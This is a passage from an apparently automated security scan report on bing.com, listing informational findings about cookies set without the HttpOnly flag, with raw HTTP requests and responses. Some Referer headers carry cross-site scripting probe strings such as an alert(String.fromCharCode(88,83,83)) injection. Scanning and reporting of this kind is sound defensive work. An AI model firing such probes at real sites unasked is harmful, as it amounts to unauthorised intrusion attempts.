Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b18f22ca108041f092c7441b3e508e6b
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:05:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(&/undefined/js
Content-Length: 17463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.16. http://www.bing.com/local/us/co/colorado%20springs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/us/co/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 749f07315b7f481d9bcac535c037827d
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001205
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_UserLocation=Colorado Springs, CO; path=/local
Set-Cookie: VE_UserLatLong=38.83310995996,-104.821729436517; path=/local
Set-Cookie: VE_LSV=cache=0; path=/local/us/co/colorado%20springs
Content-Length: 26370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.17. http://www.bing.com/local/us/dc/washington/restaurants/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:37:59 GMT
Last-Modified: Fri, 11 Feb 2011 22:37:59 GMT
X-BM-TraceID: a58b304d7fbc4d6ca32567cddb61ef32
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurants
Content-Length: 81374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

3.18. http://www.bing.com/local/ypdefault.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /local/ypdefault.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 23:45:17 GMT
Last-Modified: Fri, 11 Feb 2011 21:45:17 GMT
X-BM-TraceID: 5c0f1f0c56bc48fb8aa37c02cfb76fa8
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=105e87fa5505430dba31d5b25b248b42; path=/local
Set-Cookie: CID=84ab2256db4b4410ac7cbfab5b9a7934; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/11/2011 9:45:17 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:17 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=63F5F83330384CD78E309DFEE65F3927; domain=.bing.com; path=/
Content-Length: 55438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...

3.19. http://www.bing.com/maps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 1a0e5b1d2d614a5a8935caa2c2a373d3
X-Ve-Server: BL2-01206-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Date: Fri, 11 Feb 2011 21:44:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:28 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8E0811106C0646379A276C208363964B; domain=.bing.com; path=/
Content-Length: 116852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

3.20. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: c821dd5956474cc8a14cb3f28f6175f4
X-Ve-Server: BL2-01212-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Date: Fri, 11 Feb 2011 21:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:50 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C6FB3C601612431EA0824421BAC3CD04; domain=.bing.com; path=/
Content-Length: 116900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

3.21. http://www.bing.com/maps/explore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01208
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:13 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=ECF2B380802E49969DD2EADFA4502597; domain=.bing.com; path=/
Content-Length: 43179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...

3.22. http://www.bing.com/news/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=29DA2FA1DA7F4552877E610D60E8B949; domain=.bing.com; path=/


3.23. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5112D7B54309486995D17B4B2D97CE76; domain=.bing.com; path=/


3.24. http://www.bing.com/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /results.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:50 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1297460630; domain=.bing.com; path=/


3.25. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:47 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:47 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460807; domain=.bing.com; path=/
Set-Cookie: _SS=SID=39C40F774DB04C78BCC469B988D1944B; domain=.bing.com; path=/
Content-Length: 0


3.26. http://www.bing.com/settings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /settings.aspx?pref_sbmt=1&ru=http%3A%2F%2Fwww.bing.com%3A80%2Flocal%2F&adlt_set=demote&geoname=Washington%2C+District+Of+Columbia&geonamedef=Washington%2C+District+Of+Columbia&setplang=NO_OP&rpp=10&enAS=1&langall=1&sl=37&GUID=DC63BAA44C3843F38378B4BB213E0A6F&uid=3874D123 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com:80/local/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 23:28:20 GMT
Connection: close
Set-Cookie: SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; expires=Sun, 10-Feb-2013 23:28:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297466900; domain=.bing.com; path=/


3.27. http://www.bing.com/shopping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:46:34 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:35 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A2A898C7201E474486150618933AB2DB; domain=.bing.com; path=/
Content-Length: 90390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.28. http://www.bing.com/shopping/binoculars/c/4378

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/binoculars/c/4378

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/binoculars/c/4378 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:33 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6FA303C0EC0A468CBC9A123EAF0F8F57; domain=.bing.com; path=/
Content-Length: 89844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.29. http://www.bing.com/shopping/classic-womens-fragrances/r/162

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/classic-womens-fragrances/r/162

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/classic-womens-fragrances/r/162 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:26 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C0C28A6164ED41C38DC21B95216F1854; domain=.bing.com; path=/
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

3.30. http://www.bing.com/shopping/pet-litter-supplies/c/6874

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/pet-litter-supplies/c/6874

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/pet-litter-supplies/c/6874 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
